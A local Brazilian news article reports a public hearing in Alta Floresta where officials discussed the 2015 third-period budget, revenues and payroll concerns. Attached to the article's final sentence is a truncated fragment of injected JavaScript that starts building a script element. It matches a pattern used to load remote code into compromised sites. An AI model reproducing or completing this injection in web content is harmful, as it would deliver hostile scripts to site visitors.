Capa / Cidades / Prefeitura de Alta Floresta realiza Audiência Pública

Prefeitura de Alta Floresta realiza Audiência Pública

DSC_5215Assessoria da PMAF

Aconteceu na última segunda-feira, 29, no Auditório do Procon de Alta Floresta, uma audiência pública para expor informações sobre o orçamento, despesas e receitas, do terceiro quadrimestre de 2015, a situação financeira do município, além da aplicação dos índices constitucionais.
Segundo o secretário de Finanças, Luis Alberto Wanzke, durante o ano passado as receitas foram contempladas dentro do orçamento que foi executado. “observamos que algumas receitas superaram o valor que foi orçado, já para outras ficaram a desejar. No entanto, a questão mais evidenciada foi os índices pertinentes ao município, referentes a Saúde, a Educação e a folha de pagamento, estes foram os que não atingiram o patamar desejado”, pontuou.
De acordo com o secretário de Administração, Claudinei de Sousa Jesus a audiência tem o objetivo de informar a população sobre arrecadação e onde são investido os recursos do município, e também de refletir sobre o planejamento. “Acredito que nós temos que planejar os nossos gastos e melhorar a nossa arrecadação, a preocupação maior é sobre a folha de pagamento, pois apresentou elevado índice, contudo, estes orçamentos que foram realizados não só é relevante para esta administração, como também para uma vindoura”, declarou.
O contador da prefeitura, Dione Ferreira Lima, comentou sobre os investimentos e repasses dos convênios que o governo federal destina aos municípios. “Este ano o cenário será de maior preocupação sobre o repasse que o governo envia, pois, analiticamente a despesa fixa do município vem crescendo”, concluiu.
Além do contador Dione Ferreira Lima, que conduziu a audiência, o evento contou com a presença do chefe de gabinete, George Danielides, do secretário de Finanças, Luis Alberto Wanzke, do controlador interno, Hebertt Villarruel, dos secretários municipais de Saúde, de Educação, de Esporte e Lazer, de Administração, de Cidades, e representantes da população.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top